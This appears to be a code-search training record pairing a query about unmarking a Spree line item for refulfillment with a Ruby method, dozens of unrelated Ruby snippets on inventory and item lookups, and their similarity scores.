"def test_physicalAttackItem\n f = ItemFilter.new(\"physical_attack\", true)\n new_list = @usableItems.find_all{|x| f.apply(x)}\n return new_list.size == 2\n end",
"def get_item_availability(holding, item)\n # is_offsite = LOCATIONS['offsite_locations'].include? holding[:location_code]\n # if is_offsite\n if is_offsite_location_code?(holding[:location_code])\n self.fetch_scsb_availabilty unless @scsb_availability\n return @scsb_availability[ item[:barcode] ] if @scsb_availability.has_key?(item[:barcode])\n else\n # If we didn't find an offsite availability for this item, check Voyager availability\n self.fetch_voyager_availability unless @voyager_availability\n return @voyager_availability[ item[:item_id] ]\n end \n end",
"def find_item_by_name_in_collection(name, collection)\n counter = 0\n while counter < collection.length #which it is 3\n #collection[counter] #collection[0] then collection[1] then collection [2] then collection[3] which will end the loop\n #now we are looking for this specific item in our collection. \n if collection[counter][:item] == name\n return collection[counter]\n end\n counter += 1\n end\n #nil -to ensure nil is return if item is not in the collection\nend",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\nend",
"def find_item(name)\n items.find do |item|\n item.name == name ||\n item.short_name.gsub('…','') == name.gsub('…','')\n end\n end",
"def item_from_uuid(id)\n @items.find { |i| i[:id].to_s == id } || raise(\"Unable to resolve item for uuid '#{id}'\")\n end",
"def fetch_inventory\n @offer[:records] ||= Item.where(survivor_id: @offer[:survivor_id]).to_a\n @for[:records] ||= Item.where(survivor_id: @for[:survivor_id]).to_a\n end",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\nend",
"def fetch_item(item_selector, opts)\n query = item_selector.merge({:state => opts[:from]})\n physical_item = @inventory.find_and_modify(:query => query,\n :update => {'$set' => {:state => opts[:to], :add_time => Time.now}})\n\n physical_item['_id']\n end",
"def use_item_by_string(name, e)\n index = has_item_by_string(name)\n if (index != -1)\n inventory[index].first.use(e)\n else\n print \"What?! You don't have THAT!\\n\\n\"\n end\n end",
"def fetch(id)\n # Pass in a proc that will return true if item with id is looked up\n # (pass in invItem as a param to lambda)\n return lookup(id, Proc.new { |invItem| return invItem } )\n end",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n\n return nil\nend",
"def find_pet_by_name(shop, pet_name)\n for pet in shop[:pets]\n if pet[:name] == pet_name\n return pet\n end\n end\n return nil\nend",
"def has_item_by_string(name)\n inventory.each_with_index do |couple, index|\n if (name.casecmp(couple.first.name) == 0)\n return index\n end\n end\n return -1\n end",
"def test_locate_item\n result = locate_item(@warehouse, :b5)\n assert_equal(\"nail filer\" , result)\nend",
"def inventory_item_is_available\n \tif self.inventory_item.present? && self.inventory_item.is_available?(project.rental_delivery, project.rental_pickup) == false\n \t\terrors.add(:inventory_item, \"is not available within this project's duration\")\n \telsif self.inventory_item.blank?\n \t\tself.inventory_item = inventory_style.find_available(project.rental_delivery, project.rental_pickup)\n \t\terrors.add(:inventory_style, \"has no available items within this project's duration\") if self.inventory_item.blank?\n \tend\n end",
"def find_pet_by_name(shop, name)\n\n for pet in shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\n\nend",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\nend",
"def find_pet_by_name(pet_shop, name)\n for pet in pet_shop[:pets]\n if pet[:name] == name\n return pet\n end\n end\n return nil\nend",
"def has_item_by_string(name)\n inventory.each_with_index do |couple, index|\n if (name.casecmp(couple.first.name) == 0)\n return index\n end\n end\n\n return -1\n end",
"def withInventory\n\t\t@inventoryItems = Item.where(:inventory > 0)\n\tend",
"def lookup_info(pname, workitem)\n\n return nil unless pname\n\n wi = workitem ?\n Ruote::Workitem.new(workitem.merge('participant_name' => pname)) :\n nil\n\n get_list['list'].each do |regex, pinfo|\n\n next unless pname.match(regex)\n\n return pinfo if workitem.nil?\n\n pa = instantiate(pinfo, :if_respond_to? => :accept?)\n\n return pinfo if pa.nil?\n return pinfo if Ruote.participant_send(pa, :accept?, 'workitem' => wi)\n end\n\n # nothing found...\n\n nil\n end",
"def line_item_items_exist_in_inventory\n self.line_items.each do |line_item|\n next unless line_item.item\n inventory_item = self.from.inventory_items.find_by(item: line_item.item)\n if inventory_item.nil?\n errors.add(:inventory,\n \"#{line_item.item.name} is not available \" \\\n \"at this storage location\")\n end\n end\n end",
"def find_pet_by_name(shop_hash, pet_name)\n for pet_hash in shop_hash[:pets]\n if pet_hash[:name] == pet_name\n return pet_hash\n end\n end\n # if no matches, we expect a program to return nil.\n return nil\nend",
"def find_on_sale(name)\n flyer_items.find do |i|\n i.match?(name) unless i.nil?\n end\n end",
"def find_items_like_mine\n if self.forsale\n return Item.where('ownership_id == ? AND lower(name) == ?', WANTED, self.name.downcase)\n elsif self.wanted\n return Item.where('ownership_id == ? AND lower(name) == ?', FORSALE, self.name.downcase)\n else\n return nil\n end\n end",
"def skillitem_process(ch, object)\n # determine whether skill or item for easier reference\n case object\n when RPG::Skill\n skill, d, time = true, Skills.range(object.id), Skills.trap(object.id)\n type, charge = Skills.type(object.id), Skills.charge(object.id)\n projectile_speed = Skills.projectile_speed(object.id)\n spriteset = BlizzABS::SPRProjSkill\n when RPG::Item\n skill, d, time = false, Items.range(object.id), Items.trap(object.id)\n type, charge = Items.type(object.id), Items.charge(object.id)\n projectile_speed = Items.projectile_speed(object.id)\n spriteset = BlizzABS::SPRProjItem\n end\n # fix the missing explosion animation error\n type[2] = 0 if type[1] != EXPLNone && type[2] == nil\n # if enemy\n if ch.is_a?(Map_Enemy) && charge[0] == CHARGETrigger\n # correct charge type\n charge[0] = CHARGEMove\n end\n # if not charging already and no selection data\n if charge[0] != CHARGENone && !ch.charging? &&\n $game_temp.select_data == nil\n # setup charging\n ch.setup_charge(object, charge)\n # not used yet\n return false\n end\n # if summoning\n if type[0] == SUMMON\n # nobody except actors can summon with caterpillar turned on\n return false unless ch.is_a?(Map_Actor) && $game_system.caterpillar\n # get summoning data\n summon = (skill ? Skills.summon(object.id) : Items.summon(object.id))\n # if summon ID or time is 0\n if summon[0] == SUMMONNone || summon[1] == 0 || summon[2] == 0\n # no summoning\n return false \n end\n # no summoning if already summoned\n return false if (@pets + @monsters).any? {|b| b.battler_id == summon[1]}\n # if any summon limit reached\n if summon[0] == SUMMONPet && @pets.size >= BlizzABS::Config::MAX_PETS ||\n summon[0] == SUMMONMonster &&\n @monsters.size >= BlizzABS::Config::MAX_MONSTERS ||\n @pets.size + @monsters.size >= BlizzABS::Config::MAX_SUMMONS\n # no summoning\n return false\n end\n # create new map actor\n new_battler = Map_Actor.new(summon[1])\n # if pet\n if summon[0] == SUMMONPet\n # summon pet\n summon_pet(new_battler, summon[2])\n # if monster\n elsif summon[0] == SUMMONMonster\n # summon monster\n summon_monster(new_battler, summon[2])\n else\n # something's not right here, no summoning\n return false\n end\n # get pixel movement rate\n pix = $BlizzABS.pixel\n # move to correct position\n new_battler.moveto(ch.x / pix, ch.y / pix)\n # set correct battler\n new_battler.battler = $game_actors[summon[1]]\n # heal the battler completely\n new_battler.battler.recover_all\n # return to caterpillar first\n new_battler.cindex, new_battler.ai.state = nil, AI::Return\n # refresh display\n new_battler.refresh\n # set animation\n new_battler.animation_id = object.animation2_id\n # summon successful\n return true\n end\n # skill/item used (can be a common event call) if no target scope\n return true if object.scope == 0\n # if targeting self\n if object.scope == 7\n # if skill\n if skill\n # execute skill upon user\n ch.skill_effect(ch, ch.battler, object)\n # check special skill effects\n self.check_special_skills(ch, [ch], object)\n else\n # execute item upon user\n ch.item_effect(ch, object)\n end\n # clear damage displays\n ch.battler.damage, ch.battler.damage_pop = nil, false\n # skill/item used\n return true\n end\n # correct range\n d = 1 if d < 1\n # determine target alignment, dead flag and all flag\n enemy, dead, all = $BlizzABS.util.get_scope_data(object.scope)\n # doesn't target all and no death roulette initially\n target_all = false\n # if Tons is there and skill process\n if $tons_version != nil && $tons_version >= 6.02 && skill\n # 
if version is correct and Target 'em all! is being used for this skill\n if $game_system.TARGET_EM_ALL && FULL_TARGET_IDS.include?(object.id)\n # targets all and forces all flag\n target_all = all = true\n end\n end\n # temporary variable\n ai = ch.ai\n # determine whether actor or enemy for easier reference\n if ch.is_a?(Map_Actor)\n # decide target group\n group = (((ch == $game_player || ch.restriction != 3) == enemy) ?\n ai.negative : ai.positive)\n else\n # determine target group depending on confusion\n group = (((ch.restriction == 3) == enemy) ? ai.positive : ai.negative)\n end\n # selection only if player using selectable skill/item and not charging\n if ch == $game_player && $game_temp.select_data == nil &&\n (charge[0] == CHARGENone || charge[0] != CHARGENone &&\n ch.charged?) && (target_all || type[0] == HOMING ||\n type[0] == DIRECT || type[0] == BEAM && all)\n # temporary variable, selection skill/item\n handling = 0\n else\n # set handling for projectile skill/item or direct skill/item\n handling = ((type[0] == SHOOT || type[0] == HOMING ||\n type[0] == TRAP || type[0] == TIMED) ? 1 : 2)\n end\n # depending on handling\n case handling\n when 0 # selection\n # create circle shape data\n area = $BlizzABS.util.get_circle_area(ch, d)\n # create fullscreen rectangle\n screen = $BlizzABS.util.get_fullscreen_area\n # no use if scene not Scene_Map or spriteset doesn't exist\n return false if !$scene.is_a?(Scene_Map) || $scene.spriteset == nil\n # get all selectable map battlers\n available = $scene.spriteset.character_sprites.find_all {|sprite|\n sprite.character.is_a?(Map_Battler) &&\n !sprite.character.is_a?(Map_Remote) &&\n group.include?(sprite.character.ai.group) &&\n can_be_hit(sprite.character, dead, type, all, screen, area)}\n # no use if no selectable targets\n return false if available.size == 0\n # sort selectable targets by coordinates\n available.sort {|a, b| b.y > a.y ? 1 : b.y < a.y ? -1 : (b.x <=> a.x)}\n # setup select interuption\n $game_temp.select_data = [object, d * 32, type[0], available]\n # don't use skill/item yet\n return false\n when 1 # projectile\n # decide process branch depending on skill type\n case type[0]\n # set normal or break-through projectile data\n when SHOOT\n # if break-through\n if all\n # set break-through projectile skill or item\n projectype = (skill ? REMBreakSkill : REMBreakSkill)\n else\n # set normal projectile skill or item\n projectype = (skill ? REMNormalSkill : REMNormalItem)\n end\n # set range\n targets = [d]\n # homing skill/item\n when HOMING\n # get circle area\n area = $BlizzABS.util.get_circle_area(ch, d)\n # create fullscreen rectangle\n screen = $BlizzABS.util.get_fullscreen_area\n # get all targets that can be hit\n targets = ($game_map.battlers + $BlizzABS.battlers).find_all {|b|\n can_be_hit(b, dead, type, all, screen, area)}\n # if targetting everybody\n if target_all\n # reflection possible on everybody\n other = targets.clone\n else\n # reflection possible on non-target group\n other = targets.find_all {|b| !group.include?(b.ai.group)}\n # if predefined target exists\n if !all && ai.target != nil\n # set predefined target\n targets = [ai.target]\n else\n # set possible targets\n targets = targets.find_all {|b| group.include?(b.ai.group)}\n end\n end\n # set homing projectile type\n projectype = (skill ? REMInitSkill : REMInitItem)\n # homing skill/item\n when TRAP\n # targets for selection, other targets\n targets, other = [], []\n # set homing projectile type\n projectype = (skill ? 
REMTrapSkill : REMTrapItem)\n # homing skill/item\n when TIMED\n # targets for selection, other targets\n targets, other = [], []\n # set homing projectile type\n projectype = (skill ? REMTimedSkill : REMTimedItem)\n end\n when 2 # direct\n # if direct skill or shockwave skill\n if type[0] == DIRECT\n # get circle area\n area = $BlizzABS.util.get_circle_area(ch, d)\n # if beam skill (fullscreen skill that does not target all)\n elsif !all\n # get affection area rectangle\n area = $BlizzABS.util.get_front_area(ch, d)\n # initialize\n this = nil\n # if scene is Scene_Map and spriteset exists\n if $scene.is_a?(Scene_Map) && $scene.spriteset != nil\n # find the sprite of this character\n $scene.spriteset.character_sprites.each {|spr|\n if spr.character == ch\n this = spr\n break\n end}\n end\n # if sprite exists\n if this != nil\n # create sprite\n sprite = Sprite.new($scene.spriteset.viewport1)\n # try to\n begin\n # load the characterset file\n sprite.bitmap = RPG::Cache.character(object.icon_name, 0)\n # temporary variables\n w1, h = sprite.bitmap.width, sprite.bitmap.height\n # if failed\n rescue\n # get width and height\n w1, h = 24, d*32\n # create bitmap\n sprite.bitmap = Bitmap.new(w1, h)\n # get image from cache\n b = $BlizzABS.cache.image('beam1')\n # copy the beam image\n (0...h).each {|i|\n a = (i < h/2 ? i**2*2 : (h-i-1)**2*2)\n a = 255 if a > 255\n sprite.bitmap.blt(0, i, b, Rect.new(0, 0, b.width, b.height), a)}\n end\n w2 = case ch.direction\n when 6 then 16-w1/2\n else\n w1/2+16\n end\n # set sprite position, rotation and offsets depending on facing\n case ch.direction\n when 2\n sprite.angle, sprite.ox = 0, w1/2\n sprite.x, sprite.y, sprite.z = this.x, this.y, this.z+1\n when 4\n sprite.angle, sprite.ox, sprite.oy = 270, w2, w1/2+16\n sprite.x, sprite.y, sprite.z = this.x-w1-16, this.y, this.z-1\n when 6\n sprite.angle, sprite.ox, sprite.oy = 90, -w2, -w1/2+16\n sprite.x, sprite.y, sprite.z = this.x+16, this.y, this.z-1\n when 8\n sprite.angle, sprite.ox, sprite.oy = 180, w1/2, h+16\n sprite.x, sprite.y, sprite.z = this.x, this.y-h-32, this.z-32\n end\n # add sprite for handling\n $BlizzABS.cache.beams.push([sprite, 20])\n # set beam flag\n beam = true\n end\n end\n # create fullscreen rectangle\n screen = $BlizzABS.util.get_fullscreen_area\n # get all targets that can be hit\n targets = ($game_map.battlers + $BlizzABS.battlers).find_all {|b|\n can_be_hit(b, dead, type, all, screen, area)}\n # if targetting everybody\n if target_all\n # reflection possible on everybody\n other = targets.clone\n else\n # reflection possible on non-target group\n other = targets.find_all {|b| !group.include?(b.ai.group)}\n # if predefined target exists\n if !all && ai.target != nil\n # set predefined target\n targets = [ai.target]\n else\n # set possible targets\n targets = targets.find_all {|b| group.include?(b.ai.group)}\n end\n end\n end\n # if no selectable targets and not trap\n if targets.size == 0 && projectype != REMTrapSkill &&\n projectype != REMTrapItem && projectype != REMTimedSkill &&\n projectype != REMTimedItem\n # no use\n return (beam == true)\n end\n # if Full Reflection System is being used and not breaking reflection skill\n if $full_reflection_system != nil && $full_reflection_system >= 3.01 &&\n targets[0].is_a?(Map_Battler) && skill && !beam &&\n !BlizzCFG::BREAK_REFLECT.include?(object.id) &&\n projectype != REMTrapSkill && projectype != REMTrapItem &&\n projectype != REMTimedSkill && projectype != REMTimedItem\n # execute reflection effect in Blizz-ABS\n 
BlizzCFG.reflection_effect_blizzabs(ch, targets, other, object)\n end\n # get a random target if not targeting all and no beam or death roulette\n targets = [targets[rand(targets.size)]] if !all && !beam\n # if projectile data is available and projectile should be created\n if projectype != nil\n # temporary variable\n explode = (type[1] != EXPLNone ? type[1, 3] : nil)\n # if trap\n if projectype == REMTrapSkill || projectype == REMTrapItem\n # create trap\n proj = Map_Trap.new(spriteset + object.id.to_s, ch, object.id, d,\n time, projectype, group, dead, explode)\n # add trap to buffer\n $BlizzABS.cache.remotes.push(proj)\n # if timed trap\n elsif projectype == REMTimedSkill || projectype == REMTimedItem\n # create timed trap\n proj = Map_Timed.new(spriteset + object.id.to_s, ch, object.id, d,\n time, projectype, group, dead, explode)\n # add timed trap to buffer\n $BlizzABS.cache.remotes.push(proj)\n else\n # iterate through all targets\n targets.each {|target|\n # create projectile\n proj = Map_Projectile.new(spriteset + object.id.to_s, ch,\n object.id, target, projectile_speed, projectype, group, dead,\n explode)\n # add projectile to buffer\n $BlizzABS.cache.remotes.push(proj)}\n end\n # if skill\n elsif skill\n # execute skill effect upon all targets\n targets.each {|target| target.skill_effect(ch, ch.battler, object)}\n # check special skill effects\n self.check_special_skills(ch, targets, object)\n # clear damage displays upon all targets\n targets.each {|target|\n target.battler.damage, target.battler.damage_pop = nil, false}\n else\n # upon all targets\n targets.each {|target|\n # execute item effect\n target.item_effect(ch, object)\n # clear damage displays\n target.battler.damage, target.battler.damage_pop = nil, false}\n end\n # skill/item use successful\n return true\n end",
"def get_product( row )\n puts \"get product row:\" + row.join(\"--\")\n pro = Variant.find_by_sku( at_in(:sku , row ) )\n if pro\n puts \"Found #{at_in(:sku,row)} \"\n pro.product \n else\n p = Product.create( :name => \"sku\" , :price => 5 , :sku => \"sku\")\n p.save!\n master = Variant.find_by_sku(\"sku\")\n master.product = Product.find_by_name(\"sku\")\n master.save\n Product.find_by_name(\"sku\")\n end\n end",
"def find_item(reference)\n\t\t@items.detect{|i| i.reference == reference}\n\tend",
"def find_or_build_spill_over_virtual_purchase\n spill_over_account = expected_purchase.recipe.spill_over_virtual_account\n \n virtual_purchases.select{ |vp| vp.account_from == spill_over_account }.first ||\n virtual_purchases.build(:account_from => spill_over_account, :amount => 0)\n end",
"def find_pet_by_name(pet_shop, pet_name)\n\n for pets in pet_shop[:pets]\n\n if pets[:name] == pet_name\n\n\n return pets\n\n end\n end\n\n return\n end",
"def store_or_lookup(item)\n if asin = amazon_asin(item)\n returning AmazonItem.find_or_create_by_asin(asin) do |amazon_item|\n amazon_item.update_from_amazon(item)\n end\n end\n end",
"def available_inventory\n return self.inventory\n end",
"def check(props)\n @results = nil\n name = props.item.title[/Establish (.*)/, 1]\n\n # if full title contains a name in parenthesis, check for that name too\n altname = props.item.fulltitle[/\\((.*?)\\)/, 1]\n\n if name and Server.podlingnamesearch\n for podling in Server.podlingnamesearch\n if name == podling\n @results = Server.podlingnamesearch[name]\n elsif altname == podling\n @results = Server.podlingnamesearch[altname]\n end\n end\n end\n\n Vue.forceUpdate()\n end",
"def include?(item)\r\r\n item[:discovered]\r\r\n end",
"def find_items_like_mine\n\t\tif self.forsale\n\t\t\treturn Item.where('ownership_id == ? AND lower(name) == ?', WANTED, self.name.downcase) \n\t\telsif self.wanted \n\t\t\treturn Item.where('ownership_id == ? AND lower(name) == ?', FORSALE, self.name.downcase)\n\t else \n\t \t\treturn nil \t \n\t end \n\tend",
"def get_from_tags(resource, item)\n (resource['tags'] || []).detect { |tag, _| tag['key'].downcase == item.to_s.downcase }.try(:[], 'value')\n end",
"def use_item_by_string(name, e)\n index = has_item_by_string(name)\n if (index != -1)\n actual_item = inventory[index].first\n actual_item.use(e)\n remove_item(actual_item) if actual_item.consumable\n else\n print \"What?! You don't have THAT!\\n\\n\"\n end\n end",
"def find_item_type\n if params[:item_type].in? ['contact', 'organization', 'project', 'event']\n @item_type = params[:item_type]\n end\n end",
"def find_item_type\n if params[:item_type].in? ['contact', 'organization', 'project', 'event']\n @item_type = params[:item_type]\n end\n end",
"def get_item_from_sellable_state(inventory_item_params)\n initial_condition = inventory_item_params[:inventory_item_condition_id]\n inventory_item_in_sellable_state = get_item_in_this_state(inventory_item_params, \"Available\")\n if inventory_item_in_sellable_state.nil?\n inventory_item_in_sellable_state = get_item_in_this_state(inventory_item_params, \"Critical_Level\")\n end\n if inventory_item_in_sellable_state.nil?\n inventory_item_params[:inventory_item_condition_id] = InventoryItemCondition.find_by(name: \"Not_Sellable\" ).id\n inventory_item_in_sellable_state = get_item_in_this_state(inventory_item_params, \"Out_of_Stock\")\n inventory_item_params[:inventory_item_condition_id] = initial_condition\n end\n return inventory_item_in_sellable_state\n end",
"def food_trucks_that_sell(desired_item)\n food_truck_list = []\n @food_trucks.each do |food_truck|\n food_truck.inventory.each do |item|\n if item.first.name == desired_item.name\n food_truck_list << food_truck\n end\n end\n end\n food_truck_list\n end",
"def find_item(item)\n md5 = ItemBuilder.md5(item)\n items.find { |e| e[0] == md5 } if items\n end",
"def inventorycheck(args)\n #find inventory item by id\n Inventory.find(args) do |item|\n arr = []\n #capture stock item qty into variable\n stock = item.qty\n #loop into each item and check the existing appointments per item\n item.clinic.surgery_appts.each do |recipe|\n #check the surgery recipe requirements per appointment\n #check ONLY the items that pertain the the supply list item that was declared above\n recipe.surgery_type.surgery_recipe_reqs.where(supply_list_id:args).each do |req|\n #store those recipe requirements into the array\n arr << req.qty\n end\n end\n #sum all the items in the array together\n arr = arr.sum\n p arr\n #subract the appointment totals from the Inventory stock qty\n stock = stock - arr\n #update the Inventory stock qty\n Inventory.find(args).update(qty:stock)\n end\nend",
"def find_pet_by_name(shop,name)\n pet_name = nil ##sets pet_name to nil to ensure nil is returned if pet name is not found. (Ruby will return nil anyway if not found, but good practice to ensure it's correct)\n for pet in shop[:pets]\n if pet[:name] == name\n pet_name = pet\n end\n end\n return pet_name\nend",
"def available\n @available ||= product.available(inventory, lot_code)\n end",
"def find_item(variant, state = :on_hand, line_item = nil)\n contents.select do |item|\n item.variant == variant &&\n item.state == state &&\n (line_item.nil? || line_item == item.line_item)\n end.first\n end",
"def find(selector, opts={})\n itemFields = %{\n id\n updated\n title\n published\n abstract\n authors { nodes { name } }\n contributors { nodes { name } }\n subjects\n keywords\n language\n type\n contentType\n rights\n journal\n volume\n issue\n fpage\n lpage\n issn\n }\n\n # Individual item (e.g. GetRecord)\n if selector != :all\n selector.sub!(\"ark:/13030/\", \"\")\n selector =~ /^qt\\w{8}$/ or raise(OAI::IdException.new)\n record = apiQuery(%{\n item(id: \"ark:/13030/#{selector}\") { #{itemFields} }\n }).dig(\"item\")\n record or raise(OAI::NoMatchException.new)\n return EscholRecord.new(record)\n end\n\n # If there's a resumption token, decode it, and grab the metadata prefix\n resump = nil\n if opts[:resumption_token]\n resump = EscholResumptionToken.decode(opts[:resumption_token])\n opts[:metadata_prefix] = resump.opts[:metadata_prefix]\n opts[:set] = resump.opts[:set]\n opts.delete(:resumption_token)\n end\n\n # Check for setSpec\n queryParams = {}\n tags = []\n unitSet = nil\n if opts[:set] && opts[:set] != \"everything\"\n setStr = opts[:set].sub(/^col_/, '') # handle dspace-style \"col_\" to front of set names\n if $disciplines.include?(setStr)\n queryParams[:discTag] = [\"String!\", \"discipline:#{setStr}\"]\n tags << \"$discTag\"\n elsif apiQuery(\"unit(id: $unitID) { name }\", { unitID: [\"ID!\", setStr] }).dig(\"unit\", \"name\")\n unitSet = setStr\n elsif %w{ARTICLE CHAPTER ETD MONOGRAPH MULTIMEDIA NON_TEXTUAL}.include?(setStr)\n queryParams[:typeTag] = [\"String!\", \"type:#{setStr}\"]\n tags << \"$typeTag\"\n else\n raise(OAI::NoMatchException.new)\n end\n end\n\n # For incremental harvest, make sure we include at least 24 hours of data. This is because with\n # the Ruby OAI library it's hard for us to differentiate the actual granularity of the client\n # request, because we receive a Time here.\n fromTime = !resump && opts[:from] && opts[:from].iso8601 != @earliest ? opts[:from] : nil\n untilTime = !resump && opts[:until] && opts[:until].iso8601 != @latest ? opts[:until] : nil\n if fromTime && untilTime && untilTime < (fromTime + 24*60*60)\n untilTime = fromTime + 24*60*60\n end\n\n # Now form a GraphQL query to capture the data we want.\n # A note on the time parameters below: the OAI library we're using fills in :from and :until\n # even if they weren't specified in the URL; for efficience we filter them out in that case.\n resump and queryParams[:more] = [\"String\", resump.more]\n itemQuery = %{\n items(\n order: UPDATED_DESC\n first: 500\n include: [#{Thread.current[:privileged] ? \"EMBARGOED,WITHDRAWN,EMPTY,PUBLISHED\" : \"PUBLISHED,EMBARGOED\"}]\n #{resump ? \"\\nmore: $more\" : ''}\n #{fromTime ? \"\\nafter: \\\"#{(fromTime-1).iso8601}\\\"\" : ''}\n #{untilTime ? \"\\nbefore: \\\"#{untilTime.iso8601}\\\"\" : ''}\n #{!tags.empty? ? \"\\ntags: [#{tags.join(\",\")}]\" : ''}\n ) {\n #{resump ? 
'' : 'total'}\n more\n nodes { #{itemFields} }\n }\n }\n\n # Add unit query if a unit set was specified\n outerQuery = itemQuery\n if unitSet\n queryParams[:unitID] = [\"ID!\", unitSet]\n outerQuery = \"unit(id: $unitID) { #{itemQuery} }\"\n end\n\n # Run it and drill down to the list of items\n data = apiQuery(outerQuery, queryParams)\n unitSet and data = data['unit']\n data = data['items']\n\n # Map the results to OAI records\n records = data['nodes'].map { |record|\n EscholRecord.new(record)\n }\n\n # And add a resumption token if there are more records.\n if data['more']\n OAI::Provider::PartialResult.new(records, EscholResumptionToken.new(opts,\n (resump && resump.count) || 0, # current count\n ((resump && resump.count) || 0) + data['nodes'].length, # next count\n data['total'] || (resump && resump.total), # total\n data['more']))\n else\n records\n end\n end",
"def has_item_by_object(item)\n inventory.each_with_index do |couple, index|\n if (couple.first == item)\n return index\n end\n end\n return -1\n end",
"def has_item_by_object(item)\n inventory.each_with_index do |couple, index|\n if (couple.first == item)\n return index\n end\n end\n return -1\n end",
"def find_pet_by_name(petshop,pet_name)\n petshop[:pets].each do \n if pet_hash[:name] == pet_name\n return pet_hash\n end\n end\n return nil\n end",
"def strict_matching(ingredient_name,item)\n return item.downcase.include?(ingredient_name)\nend",
"def refine_item_outlook(item)\n the_item = {}\n if Status.find(item.status_id).value.include? \"Banned\"\n the_item = {id: item.id, title: item.title, description: item.description, category: Category.find(item.category_id).value, \n price: \"%.2f\" % item.price, seller_longitude: Seller.find(item.seller_id).longitude,\n seller_latitude: Seller.find(item.seller_id).latitude, status: Status.find(item.status_id).value}\n else \n the_item = {id: item.id, title: item.title, description: item.description, category: Category.find(item.category_id).value, \n price: \"%.2f\" % item.price, seller_name: Seller.find(item.seller_id).name, seller_longitude: Seller.find(item.seller_id).longitude,\n seller_latitude: Seller.find(item.seller_id).latitude, status: Status.find(item.status_id).value, published_date: item.published_date}\n end\n return the_item\n end"
] | [
"0.5888857",
"0.5794193",
"0.57222027",
"0.55928975",
"0.55855024",
"0.5517034",
"0.5466443",
"0.5454543",
"0.54469365",
"0.5445379",
"0.54404634",
"0.5355519",
"0.5347431",
"0.534116",
"0.53241557",
"0.52610016",
"0.52512985",
"0.5249569",
"0.5247355",
"0.52398074",
"0.5233867",
"0.5195433",
"0.5194405",
"0.5180294",
"0.5176287",
"0.51709247",
"0.5167681",
"0.5166536",
"0.51460266",
"0.51417696",
"0.5119549",
"0.5109891",
"0.5100992",
"0.50939214",
"0.50922513",
"0.509121",
"0.50857097",
"0.5083151",
"0.5079385",
"0.50632536",
"0.5056973",
"0.5034459",
"0.5034459",
"0.50299865",
"0.50297076",
"0.5028186",
"0.5027168",
"0.50195843",
"0.50181097",
"0.50086343",
"0.5008043",
"0.5007635",
"0.50057274",
"0.49977845",
"0.49975497",
"0.4997292",
"0.4992181",
"0.49838042",
"0.4981088",
"0.49794585",
"0.49726778",
"0.49686134",
"0.49656758",
"0.4965639",
"0.49627644",
"0.49627644",
"0.49611402",
"0.49486405",
"0.49473178",
"0.49465138",
"0.4943728",
"0.49434328",
"0.49387828",
"0.4937059",
"0.4928514",
"0.4925883",
"0.49209556",
"0.49041352",
"0.4899629",
"0.4895222",
"0.4890031",
"0.48890477",
"0.4886184",
"0.488356",
"0.48731408",
"0.48725018",
"0.48725018",
"0.48714542",
"0.48703852",
"0.48684505",
"0.48684213",
"0.4868186",
"0.48626012",
"0.48566884",
"0.4852241",
"0.4851846",
"0.4851846",
"0.4849559",
"0.48456007",
"0.48398837"
] | 0.56648356 | 3 |
unmark a line item for refulfillment; chose not to increment the inventory count due to the possibility that inventory was refreshed, better to err on the side of less inventory (a sketch of the rejected alternative follows this record) | def unrefulfill_line_item(line_item_id)
li = Spree::LineItem.find(line_item_id)
li.refulfill = nil
li.save
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def decrement_line_item_quantity(line_item_id)\n current_item = line_items.find(line_item_id)\n if current_item.quantity > 1\n current_item.quantity -= 1\n else\n current_item.destroy\n end\n current_item\n end",
"def recover_usage(quantity_to_be_recovered)\n self.used_quantity -= quantity_to_be_recovered \n self.save \n \n self.unmark_as_finished\n \n item = self.item \n item.update_ready_quantity\n \n return self \n end",
"def find_match_and_decrement_available(line_item)\n gs = Orders::LineItemPresenter.new(line_item).global_sku\n if rii = ReturnInventoryItem.where([\"upc= ? and active = true and available > 0\", gs&.id]).first\n rii.available -= 1\n rii.save\n elsif gs\n #do this check since global skus are jacked up and can't be trusted\n gs = GlobalSku.where(\n style_number: gs.style_number,\n product_name: gs.product_name,\n size: gs.size,\n color_id: gs.color_id,\n customisation_id: gs.customisation_id,\n height_value: gs.height_value,\n product_id: gs.product_id,\n ).first\n\n if rii = ReturnInventoryItem.where([\"upc = ? and active = true and available > 0\", gs&.id]).first\n rii.available -= 1\n rii.save\n end\n end\n rii\n end",
"def decrease\n @line_item = @current_cart.line_items.where(:id => params[:line_item_id]).first\n if @line_item.count > 0\n @line_item.update_attribute :count, @line_item.count - 1\n else\n @line_item.destroy # destroy database record if quantity was decreased to 0\n end\n end",
"def refill(item_name:, quantity:)\n total_items_quantity[item_name] += quantity\n items_running_low[item_name] = false\n end",
"def recover_usage(quantity_to_be_recovered)\n self.used_quantity -= quantity_to_be_recovered \n self.save \n \n self.unmark_as_finished\n \n \n \n item = self.item \n item.add_ready_quantity( quantity_to_be_recovered ) \n \n return self \n end",
"def check_line_item_in_inventory(line_item)\n # feature flipper\n if Features.inactive?(:refulfill)\n return true\n end\n found = false\n\n if rii = find_match_and_decrement_available(line_item)\n if line_item.order.shipping_address.country.name == 'United States' && rii.vendor == 'bergen'\n line_item.return_inventory_item = rii\n line_item.refulfill_status = 'new'\n found = true\n line_item.save\n elsif line_item.order.shipping_address.country.name == 'Australia' && rii.vendor == 'next'\n line_item.return_inventory_item = rii\n line_item.refulfill_status = 'new'\n found = true\n line_item.save\n end\n end\n found\n end",
"def perform_scrap_item_replacement( scrap_recover_quantity) \n self.scrapped_quantity -= scrap_recover_quantity \n self.save \n \n self.unmark_as_finished \n \n item.deduct_scrap_quantity( scrap_recover_quantity ) \n \n return self\n end",
"def perform_scrap_item_replacement( scrap_recover_quantity) \n self.scrapped_quantity -= scrap_recover_quantity \n self.save \n \n self.unmark_as_finished \n \n item.deduct_scrap_quantity( scrap_recover_quantity ) \n \n return self\n end",
